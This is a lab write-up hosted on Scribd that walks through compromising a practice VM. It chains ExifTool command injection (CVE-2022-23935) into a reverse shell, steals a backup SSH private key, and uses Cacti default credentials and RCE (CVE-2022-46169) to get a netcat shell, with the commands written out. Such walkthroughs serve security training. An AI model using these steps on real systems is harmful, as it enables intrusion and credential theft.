Scribd
Upload
6 views

Sample VM Writeup

The document outlines a step-by-step process for exploiting a vulnerable virtual machine (VM) with a private IP of 10.0.2.4, which has open ports 22 and 80. It details the discovery of a web application using Exiftool with a known vulnerability (CVE-2022-23935) that allows command injection, leading to privilege escalation through SSH access. The process culminates in exploiting another vulnerability in a web application called Cacti to gain a shell access, successfully completing the task of solving the box.

Uploaded by

dinesh007aced
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
6 views

Sample VM Writeup

The document outlines a step-by-step process for exploiting a vulnerable virtual machine (VM) with a private IP of 10.0.2.4, which has open ports 22 and 80. It details the discovery of a web application using Exiftool with a known vulnerability (CVE-2022-23935) that allows command injection, leading to privilege escalation through SSH access. The process culminates in exploiting another vulnerability in a web application called Cacti to gain a shell access, successfully completing the task of solving the box.

Uploaded by

dinesh007aced
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

Vulnerable VM

Solving the Box.


The first thing to do is to find the Vulnerable Machine in the network. Start by doing a Nmap
scan.

We found the Vulnerable VM, with a private ip address of 10.0.2.4

It’s also showing two ports open 22 and 80.

Port 22 is ssh and port 80 is http. This means there is a web server running on port 80. Let’s
open a browser and check it out.
We can see a webpage that allows us to file complaints. If you file one, it will take you to another
page.

Checking the website's sources doesn’t reveal anything else as well. Fuzzing the web
application to find other directories.
The tools ffuf allows to perform directory brute forcing.

A directory called actual has been discovered.

This is an image analysis website. We can upload an image, it is analyzed by exiftool and its
metadata is printed on the webpage. The version of exiftool is 12.37.
Searching for vulnerabilities for this version of Exiftool.

https://github.com/cowsecurity/CVE-2022-23935

CVE-2022-23935

The vulnerability arises due to improper file check, which leads to command injection.

The full patch can be found here.


Let’s download a publicly available PoC and run it against the system.

Downloading the PoC from Git Hub. The PoC requires the pwn module in Python.

pip install pwn

Running the PoC, with the attacker machine ip address and the port we will be listening to.

ip addr

python3 CVE-2022-23935.py ip port

Make sure to change the ip and port value to your machine's IP address and the port number
you want to listen to, as seen in the image above.

This will generate an image with the malicious file name which will cause the exiftool to execute
commands.
Uploading the image file.

We get the shell.

The next step is to start enumerating the machine to find information that can help us to gain
higher privileges on the machine.

Traversing to the home directory, there is a user called Kermit.


In Kermit home, there is a .ssh directory with ssh keys. But in any Linux system, the private will
have the permission of 400 or 600. This is by default. In this case, you can see the id_rsa file
having permission as 400.

But people copy these private keys in other folders or some cases people generate keys in
certain locations and then copy them to the .ssh directory.

Let’s list the home directory again.

There is a .bak folder. There is an id_rsa key present, with permission 444.
Grabbing the ssh key.

cat /home/kermit/.bak/id_rsa

Once we get the ssh-key, we will copy it to a file and save it in the attacker's machine. Change
the file permissions of the private key.

chmod 600 id_rsa


The next thing to do is to ssh in. Make sure to put the IP address of your machine.
ssh [email protected] -i id_rsa​

We can read the user flag now.

cat user.txt

user{cdc2ec2673abd58db14c8a70e231d007f6c2ae347b27b7c8e4eeb93e1ed61fdb}

There is a local web application running in the system. We can find this out by enumerating the
file system. An entrypoint.sh file is present which shows that a php server is being run on port
8000 with the file system being /var/www/html.

You can also do netstat check to find ports that are in use in the system. ​

netstat -an

We can route this local web server to a port in the attacker machine using ssh.

ssh -L 8000:127.0.0.1:8000 [email protected] -i id_rsa


This will allow us to gain access to the web application. The web application at
http://127.0.0.1:8000/

We can see that the app is called cacti and the version is 1.2.22

Searching on the web shows us that this application is vulnerable to RCE.

https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22

The vulnerability arises due to the fact that in the file remote_agent.php, the poller_id parameter
is vulnerable. Below you can see the vulnerable code. The proc_open can be used to execute
commands and any unauthorized user can manipulate the poller_id parameter. There is no
validation as well.
We need to log in to the application to create a graph first since it’s required for this to work.

The default creds admin:admin will work for the login. Once we are in the system, click on
Create Graphs.

You might have to install the application first. The system admin only set up the application a
few days back. ​

You can choose several templates in the create option. What we are looking for are the
templates that monitor the system. In this case, Device uptime is one.
Click create. This will create a template that we can exploit.

Create a listener on the port where you want to get the shell.

nc -nvlp 1337



Now use the PoC given in the above link.

python3 exp.py -u http://127.0.0.1:8000 --LHOST=10.0.2.5 --LPORT=1337


Congrats!! You have solved the box!!

You might also like